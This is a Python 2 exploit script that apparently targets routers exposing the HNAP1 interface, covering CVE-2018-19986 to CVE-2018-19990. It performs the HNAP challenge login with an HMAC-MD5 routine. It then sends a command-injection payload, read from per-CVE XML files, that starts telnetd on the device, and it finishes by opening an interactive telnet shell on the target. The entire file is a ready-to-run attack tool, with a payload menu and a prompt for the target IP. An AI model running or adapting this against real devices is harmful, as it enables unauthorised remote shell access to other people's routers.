import requests
import telnetlib
from hashlib import md5
import time
import math

trans_5C = "".join(chr(x ^ 0x5c) for x in xrange(256))
trans_36 = "".join(chr(x ^ 0x36) for x in xrange(256))
blocksize = md5().block_size

def hmac_md5(key, msg):
    if len(key) > blocksize:
        key = md5(key).digest()
    key += chr(0) * (blocksize - len(key))
    o_key_pad = key.translate(trans_5C)
    i_key_pad = key.translate(trans_36)
    return md5(o_key_pad + md5(i_key_pad + msg).digest())

def HNAP_AUTH(SOAPAction, privateKey):
    b = math.floor(int(time.time())) % 2000000000
    b = str(b)[:-2]
    h = hmac_md5(privateKey, b + '"http://purenetworks.com/HNAP1/' + SOAPAction + '"').hexdigest().upper()
    return h + " " + b

poc_list = [['1', 'CVE-2018-19986', '/HNAP1/SetRouterSettings'],
            ['2', 'CVE-2018-19987', '/HNAP1/SetAccessPointMode'],
            ['3', 'CVE-2018-19988_1', '/HNAP1/SetClientInfoDemo'],
            ['4', 'CVE-2018-19988_2', '/HNAP1/SetClientInfoDemo'],
            ['5', 'CVE-2018-19989', '/HNAP1/SetQoSSettings'],
            ['6', 'CVE-2018-19990', '/HNAP1/SetWiFiVerifyAlpha']]

for i in poc_list:
    print(i)
n = int(raw_input("select payload>>"))
poc = poc_list[n-1]

IP = raw_input("IP>>")
adminPw = raw_input("pw>>")

command = "telnetd" # command injection id

headers = requests.utils.default_headers()
headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36"
headers["SOAPAction"] = '"http://purenetworks.com/HNAP1/Login"'
headers["Origin"] = "http://" + IP
headers["Referer"] = "http://" + IP + "/info/Login.html"
headers["Content-Type"] = "text/xml; charset=UTF-8"
headers["X-Requested-With"] = "XMLHttpRequest"

payload = '<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><Login xmlns="http://purenetworks.com/HNAP1/"><Action>request</Action><Username>Admin</Username><LoginPassword></LoginPassword><Captcha></Captcha></Login></soap:Body></soap:Envelope>'
r = requests.post('http://'+IP+'/HNAP1/', headers=headers, data=payload)
data = r.text

challenge = str(data[data.find("<Challenge>") + 11: data.find("</Challenge>")])
cookie = data[data.find("<Cookie>") + 8: data.find("</Cookie>")]
publicKey = str(data[data.find("<PublicKey>") + 11: data.find("</PublicKey>")])

privateKey = hmac_md5(publicKey + adminPw, challenge).hexdigest().upper()
password = hmac_md5(privateKey, challenge).hexdigest().upper()

headers["HNAP_AUTH"] = HNAP_AUTH("Login", privateKey)
headers["Cookie"] = "uid=" + cookie
payload = '<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><Login xmlns="http://purenetworks.com/HNAP1/"><Action>login</Action><Username>Admin</Username><LoginPassword>'+password+'</LoginPassword><Captcha></Captcha></Login></soap:Body></soap:Envelope>'
r = requests.post('http://'+IP+'/HNAP1/', headers=headers, data=payload)


headers["Origin"] = "http://" + IP
headers["HNAP_AUTH"] = HNAP_AUTH(poc[2].split('/')[-1], privateKey)
headers["SOAPACTION"] = '"http://purenetworks.com{}"'.format(poc[2])
headers["Accept"] = "text/xml"

payload = open('{}.xml'.format(poc[1])).read().replace('ip', IP).replace('COMMAND', command)

print '[*] command injection'
r = requests.post('http://'+IP+'/HNAP1/', headers=headers, data=payload)
print(r.text)

print '[*] waiting 30 sec...'
time.sleep(30)

print '[*] enjoy your shell'
telnetlib.Telnet(IP).interact()
